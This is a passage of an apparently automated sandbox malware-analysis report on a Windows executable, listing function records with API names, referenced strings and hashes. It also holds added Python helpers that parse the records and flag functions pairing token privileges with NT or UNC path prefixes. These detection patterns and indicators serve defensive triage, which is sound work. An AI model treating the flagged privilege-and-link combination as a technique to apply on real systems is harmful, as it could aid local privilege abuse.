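    records: list[FunctionRecord] = []
    in_apis = False
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            records.append(FunctionRecord())
            in_apis = True
        elif not records or line in SECTION_HEADERS:
            in_apis = False
        elif in_apis:
            m = API_RE.match(line)
            if m:   # lines that are not API refs are ignored rather than guessed at
                args = [a for a in (m["args"] or "").split(",") if a]
                sub = int(m["sub"], 16) if m["sub"] else None
                records[-1].apis.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16), sub))
        else:
            m = KV_RE.match(line)
            if m:
                records[-1].fields[m["key"].strip()] = m["val"].strip()
    return records


def functions_calling(records: list[FunctionRecord], api: str) -> list[FunctionRecord]:
    """Records whose call list (subcalls included) names the given API."""
    return [r for r in records if any(a.name == api for a in r.apis)]


def win32_imports(records: list[FunctionRecord]) -> list[str]:
    """Distinct MODULE!Name pairs, dropping LIBCMT (CRT-internal) helpers."""
    return sorted({f"{a.module}!{a.name}" for r in records
                   for a in r.apis if a.module != "LIBCMT"})
```

                                                  The Opcode ID is a plain hash and is the field to use for exact-match lookups across reports; the Instruction and Opcode Fuzzy Hash formats are Joe Sandbox's own, so the parser carries them through as strings and does not attempt to score similarity with them.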
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                                                  • String ID:
                                                  • API String ID: 1173176844-0
                                                  • Opcode ID: ac554a43d54612151bc7e480101717375080be3004ee5b366f50feb51e7139dd
                                                  • Instruction ID: f68b51ef108bddd1f80f8cc36f7f9385979cf2c4ed104020110e11078566c1ef
                                                  • Opcode Fuzzy Hash: ac554a43d54612151bc7e480101717375080be3004ee5b366f50feb51e7139dd
                                                  • Instruction Fuzzy Hash: 7FE0B640F3A10B45FD286A653C772B401504F19376E5817B8FABEC86C3AE1CB4928215
                                                  APIs
                                                   Similarity
                                                   • API ID: ErrorFreeHeapLast
                                                  APIs
                                                   Similarity
                                                   • API ID: _invalid_parameter_noinfo_noreturn
                                                  APIs
                                                   Similarity
                                                   • API ID: CompareString_invalid_parameter_noinfo_noreturn
                                                  APIs
                                                    • Part of subcall function 00007FF6CA9DE948: ReleaseSemaphore.KERNEL32 ref: 00007FF6CA9DE974
                                                    • Part of subcall function 00007FF6CA9DE948: CloseHandle.KERNELBASE ref: 00007FF6CA9DE993
                                                    • Part of subcall function 00007FF6CA9DE948: DeleteCriticalSection.KERNEL32 ref: 00007FF6CA9DE9AA
                                                    • Part of subcall function 00007FF6CA9DE948: CloseHandle.KERNEL32 ref: 00007FF6CA9DE9B7
                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CA9E1ACB
                                                   Similarity
                                                   • API ID: CloseHandle$CriticalDeleteReleaseSectionSemaphore_invalid_parameter_noinfo_noreturn
                                                  APIs
                                                   Similarity
                                                   • API ID: _invalid_parameter_noinfo_noreturn
                                                  APIs
                                                    • Part of subcall function 00007FF6CA9D3EC8: FindClose.KERNELBASE(?,?,00000000,00007FF6CA9E0811), ref: 00007FF6CA9D3EFD
                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CA9CE993
                                                   Similarity
                                                   • API ID: CloseFind_invalid_parameter_noinfo_noreturn
                                                  APIs
                                                   Similarity
                                                   • API ID: _invalid_parameter_noinfo_noreturn
                                                  APIs
                                                   Similarity
                                                   • API ID: _invalid_parameter_noinfo_noreturn
                                                  APIs
                                                   Similarity
                                                   • API ID: Concurrency::cancel_current_taskstd::bad_alloc::bad_alloc
                                                  APIs
                                                   Similarity
                                                   • API ID: _invalid_parameter_noinfo_noreturn
                                                  APIs
                                                   Similarity
                                                   • API ID: _invalid_parameter_noinfo
                                                  APIs
                                                   Similarity
                                                   • API ID: _invalid_parameter_noinfo_noreturn
                                                  APIs
                                                    • Part of subcall function 00007FF6CA9F1604: GetModuleHandleW.KERNEL32(?,?,?,00007FF6CA9F1573,?,?,?,00007FF6CA9F192A), ref: 00007FF6CA9F162B
                                                  • DloadProtectSection.DELAYIMP ref: 00007FF6CA9F15C9
                                                   Similarity
                                                   • API ID: DloadHandleModuleProtectSection
                                                  APIs
                                                    • Part of subcall function 00007FF6CA9D40BC: FindFirstFileW.KERNELBASE ref: 00007FF6CA9D410B
                                                    • Part of subcall function 00007FF6CA9D40BC: FindFirstFileW.KERNELBASE ref: 00007FF6CA9D415E
                                                    • Part of subcall function 00007FF6CA9D40BC: GetLastError.KERNEL32 ref: 00007FF6CA9D41AF
                                                  • FindClose.KERNELBASE(?,?,00000000,00007FF6CA9E0811), ref: 00007FF6CA9D3EFD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: Find$FileFirst$CloseErrorLast
                                                  • String ID:
                                                  • API String ID: 1464966427-0
                                                  • Opcode ID: 18fe74ab7ca813274cb64c08179860cc48efc587ad39327f0b25563dc18ddab5
                                                  • Instruction ID: def547e94db6800a0874eefeb56c347f2813b903f105cb7955ce7416c26de3f4
                                                  • Opcode Fuzzy Hash: 18fe74ab7ca813274cb64c08179860cc48efc587ad39327f0b25563dc18ddab5
                                                  • Instruction Fuzzy Hash: DEF0F462D1868181EB109F75B11217A33609B09BB6F1413B4EABDC72C7CE28D4C4C744
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID:
                                                  • API String ID: 3081899298-0
                                                  • Opcode ID: df9a28314c6b6fddfb177ebf539387614dcb0363737e1ba4f38fe55c4f903e1a
                                                  • Instruction ID: 092c641326b68f21a374b4bbd1b0818ce224b80715be3bec5185fd7a9cf1cb34
                                                  • Opcode Fuzzy Hash: df9a28314c6b6fddfb177ebf539387614dcb0363737e1ba4f38fe55c4f903e1a
                                                  • Instruction Fuzzy Hash: 7BD02222D0944082DD008F39B8A203C2300AF8233BFA003B0CA7EC22E2CE1C90C6E302
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: CurrentDirectory
                                                  • String ID:
                                                  • API String ID: 1611563598-0
                                                  • Opcode ID: 176ab68ebee512dad0278907058cd855c5c44f8615b79807412a7d406b36e525
                                                  • Instruction ID: 132512fe4dd5fdb3e78a36f1fe11c32b7caee0b1dcaec11e244fd83e2171a613
                                                  • Opcode Fuzzy Hash: 176ab68ebee512dad0278907058cd855c5c44f8615b79807412a7d406b36e525
                                                  • Instruction Fuzzy Hash: 25C08C20F15502C1DA089F2AD8DA01823A4BB44B06B608074C14DC2120CE2CC4FA9349
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: AllocHeap
                                                  • String ID:
                                                  • API String ID: 4292702814-0
                                                  • Opcode ID: c4d23aaef5024e3722ccbb242168b3e22d65bf63548bcaacbbf61b8d0a3ba7a1
                                                  • Instruction ID: 872fbfe9df2f9627d81b193196d98c06ab989412d65d6f345436438b8e88096c
                                                  • Opcode Fuzzy Hash: c4d23aaef5024e3722ccbb242168b3e22d65bf63548bcaacbbf61b8d0a3ba7a1
                                                  • Instruction Fuzzy Hash: EDF06251B2960745FE545FA1BD323B412905F44B86F0854B9E98FC63D3FD1CE5814110
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: AllocHeap
                                                  • String ID:
                                                  • API String ID: 4292702814-0
                                                  • Opcode ID: 5fa632deebd8181b9f3ea37834cf4eccbda839d7d0d6f948310c23224b4a93e7
                                                  • Instruction ID: efd4d0cd91ebec77261e9fb063fbe0d0f5276e6914594b8db4c1707b563d1e03
                                                  • Opcode Fuzzy Hash: 5fa632deebd8181b9f3ea37834cf4eccbda839d7d0d6f948310c23224b4a93e7
                                                  • Instruction Fuzzy Hash: 3BF08250B2A24744FF145EF17C7227422905F447AAF0856B8FDEEC63D3EE1CA4C18111
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle
                                                  • String ID:
                                                  • API String ID: 2962429428-0
                                                  • Opcode ID: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
                                                  • Instruction ID: ad1db4119752621d4a074c8e04887b6b0b598e531cc13dc16b341587553e07c4
                                                  • Opcode Fuzzy Hash: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
                                                  • Instruction Fuzzy Hash: 1BF08132E1868285FB248F20F1962792660EB14B7AF488379D7BDC11D5CE28D8D5C701
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$CloseErrorFileHandleLastProcesswcscpy$ControlCreateCurrentDeleteDeviceDirectoryOpenRemoveToken
                                                  • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                  • API String ID: 1185621794-3508440684
                                                  • Opcode ID: a84aa70939fdc4d5130ca79eb44cdbeddb280aae2f0e340eeceaf87b90cfbfd1
                                                  • Instruction ID: e906180a80a81dfc5f2418e79365f62f8d6d666f61cf1481ba0d089e5649cfe8
                                                  • Opcode Fuzzy Hash: a84aa70939fdc4d5130ca79eb44cdbeddb280aae2f0e340eeceaf87b90cfbfd1
                                                  • Instruction Fuzzy Hash: 8162F562F28A4245FB00EFB8E4662BD2761EB457A9F504271DAADD3AD6DF3CD185C300
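                                                  Of all the function records in this listing, the one above deserves a closer look: its referenced strings pair two token privileges (SeCreateSymbolicLinkPrivilege, SeRestorePrivilege) with the NT object-manager prefix \??\ and a UNC\ prefix, and its API ID contains Token, Device/Control, CreateFile, DeleteFile and RemoveDirectory fragments. That combination is consistent with a function that adjusts its privileges and then creates or removes links and reparse points on paths it names directly, which is worth confirming in the disassembly rather than from the signature alone. The following Python is an added triage helper, not part of the Joe Sandbox report and not sandbox code: it parses records in the "Similarity" format used on this page and flags those whose strings combine a privilege name with an NT or UNC path prefix. The sample input is a two-record excerpt transcribed from this page (backslashes escaped for Python), and the heuristics PRIV_RE, NT_PREFIXES and TOKEN_API_MARKERS are the editor's assumptions, not Joe Sandbox signatures.

```python
"""Triage helper for Joe Sandbox 'Similarity' function records.

Added example, not part of the report: parses the per-function records in
the format shown on this page and flags functions whose referenced strings
combine Windows privilege names with NT object-manager / UNC path prefixes.
"""
import re
from dataclasses import dataclass

# Constructed input: two records transcribed from the report above
# (bullets and whitespace normalised; backslashes escaped for Python).
SAMPLE = (
    "Similarity\n"
    "• API ID: CloseHandle\n"
    "• String ID:\n"
    "• API String ID: 2962429428-0\n"
    "• Opcode ID: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065\n"
    "• Instruction ID: ad1db4119752621d4a074c8e04887b6b0b598e531cc13dc16b341587553e07c4\n"
    "Similarity\n"
    "• API ID: _invalid_parameter_noinfo_noreturn$CloseErrorFileHandleLastProcesswcscpy"
    "$ControlCreateCurrentDeleteDeviceDirectoryOpenRemoveToken\n"
    "• String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\\$\\??\\\n"
    "• API String ID: 1185621794-3508440684\n"
    "• Opcode ID: a84aa70939fdc4d5130ca79eb44cdbeddb280aae2f0e340eeceaf87b90cfbfd1\n"
    "• Instruction ID: e906180a80a81dfc5f2418e79365f62f8d6d666f61cf1481ba0d089e5649cfe8\n"
)

# Field labels as they appear in the report, mapped to attribute names.
FIELDS = {
    "API ID": "api_id",
    "String ID": "string_id",
    "API String ID": "api_string_id",
    "Opcode ID": "opcode_id",
    "Instruction ID": "instruction_id",
}
# Longest label first so "API String ID" is not mis-read as "String ID".
FIELD_RE = re.compile(
    r"^\s*[•*-]?\s*(API String ID|API ID|String ID|Opcode ID|Instruction ID):\s*(.*?)\s*$"
)


@dataclass
class FunctionRecord:
    api_id: str = ""
    string_id: str = ""
    api_string_id: str = ""
    opcode_id: str = ""
    instruction_id: str = ""

    @property
    def strings(self):
        # '$' separates the individual strings the function was seen to reference.
        return [s for s in self.string_id.split("$") if s]

    @property
    def api_groups(self):
        # '$' also separates groups of concatenated API-name fragments in the API ID.
        return [g for g in self.api_id.split("$") if g]


def parse_records(text):
    """Split the listing into FunctionRecords, one per 'Similarity' header."""
    records, current = [], None
    for line in text.splitlines():
        if line.strip() == "Similarity":
            current = FunctionRecord()
            records.append(current)
            continue
        m = FIELD_RE.match(line)
        if m and current is not None:
            setattr(current, FIELDS[m.group(1)], m.group(2))
    return records


# Editor's heuristics (assumptions, not Joe Sandbox signatures).
PRIV_RE = re.compile(r"^Se[A-Za-z]+Privilege$")      # e.g. SeRestorePrivilege
NT_PREFIXES = ("\\??\\", "\\\\.\\", "UNC\\")          # object-manager / device / UNC paths
TOKEN_API_MARKERS = ("Token", "Device", "Symbolic")   # fragments to look for in the API ID


def triage(records):
    """Return (record, reasons) for records that look like privileged path or link work."""
    findings = []
    for rec in records:
        reasons = []
        privs = [s for s in rec.strings if PRIV_RE.match(s)]
        if privs:
            reasons.append("requests privileges: " + ", ".join(privs))
        paths = [s for s in rec.strings if s.startswith(NT_PREFIXES)]
        if paths:
            reasons.append("builds NT/UNC paths: " + ", ".join(paths))
        markers = [m for m in TOKEN_API_MARKERS if m in rec.api_id]
        if markers:
            reasons.append("API fragments: " + ", ".join(markers))
        # Require both a privilege and a path prefix; API fragments alone are too noisy.
        if privs and paths:
            findings.append((rec, reasons))
    return findings


if __name__ == "__main__":
    for rec, reasons in triage(parse_records(SAMPLE)):
        print(rec.api_string_id)
        for reason in reasons:
            print("  -", reason)
```

                                                  Feed it the whole function listing rather than the excerpt to rank which of the several hundred records to open in the disassembler first; the API String ID it prints is the same identifier the report uses, so a hit can be located on the page directly.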
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$ErrorLastLoadString$Concurrency::cancel_current_taskInit_thread_footer
                                                  • String ID: %ls$%s: %s
                                                  • API String ID: 2539828978-2259941744
                                                  • Opcode ID: 2a428d3ebb24feb53c72cbcb96e10c35073f7b4c7138419c8edb3699ce975ff8
                                                  • Instruction ID: 1dce1d2379d84cf724647bc9ce72e88225896d4f8461c4330f61336123a0844d
                                                  • Opcode Fuzzy Hash: 2a428d3ebb24feb53c72cbcb96e10c35073f7b4c7138419c8edb3699ce975ff8
                                                  • Instruction Fuzzy Hash: 39B2A962E6868241EA109F69F4662BAA351FFC5791F104376E6DDC7ADBEE2CD180C340
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfomemcpy_s
                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                  • API String ID: 1759834784-2761157908
                                                  • Opcode ID: c1568b5568d689d261f1f0b975b9c1104ab10acfc5286cd5346a40821ab4f9bc
                                                  • Instruction ID: a7e9334963d8cc1768f9e1f6a351beb426c805d6535c1991fa7b7d759473d10a
                                                  • Opcode Fuzzy Hash: c1568b5568d689d261f1f0b975b9c1104ab10acfc5286cd5346a40821ab4f9bc
                                                  • Instruction Fuzzy Hash: 96B2F772E182C28BE7258EA9E4A06FD37A1FB44389F505175DB4BD7B84DF39E5068B00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: NamePath$File_invalid_parameter_noinfo_noreturn$LongMoveShort$CompareCreateString
                                                  • String ID: rtmp
                                                  • API String ID: 3587137053-870060881
                                                  • Opcode ID: b2302a8994294e2a6b84eb5060b7698c6ea0863429eff8cfdf69f426307ffe72
                                                  • Instruction ID: db68cd2720fa867710bf4e8dc72fd4cac4ac194e5177d7fdcbdf0eeba41a0218
                                                  • Opcode Fuzzy Hash: b2302a8994294e2a6b84eb5060b7698c6ea0863429eff8cfdf69f426307ffe72
                                                  • Instruction Fuzzy Hash: 6BF1C123F28A8281EB10DF65E4A11BD6771EB85785F600176EA8DC3AAADF3CD5C5C340
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: FullNamePath_invalid_parameter_noinfo_noreturn
                                                  • String ID:
                                                  • API String ID: 1693479884-0
                                                  • Opcode ID: eb320a448f2f5b685a05a21c57fd524cc8e4434a836e962e5226f9c8e5b08568
                                                  • Instruction ID: 97e6f9a74b32e5a55899def41bd0de5dd040aa23aa803db1a253c9e21369f9ac
                                                  • Opcode Fuzzy Hash: eb320a448f2f5b685a05a21c57fd524cc8e4434a836e962e5226f9c8e5b08568
                                                  • Instruction Fuzzy Hash: D6A19162F24A5184FF009FB9A8661BC2361AF45BE5B144275DEADD7BDADE3CD082C304
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 3140674995-0
                                                  • Opcode ID: eb4060bcbbf6947450414bc0ac192b8da1feec02df413969c5a674799d26ef14
                                                  • Instruction ID: f2895b8bc9a73c009d4f28b8b8fe4dbf4004aa6f995d55eae142826f46d386dc
                                                  • Opcode Fuzzy Hash: eb4060bcbbf6947450414bc0ac192b8da1feec02df413969c5a674799d26ef14
                                                  • Instruction Fuzzy Hash: 92317272618B818AEB648F60F8603EE3360FB88745F444039DA8E87B89DF3CD549C714
                                                  APIs
                                                  Memory Dump Source
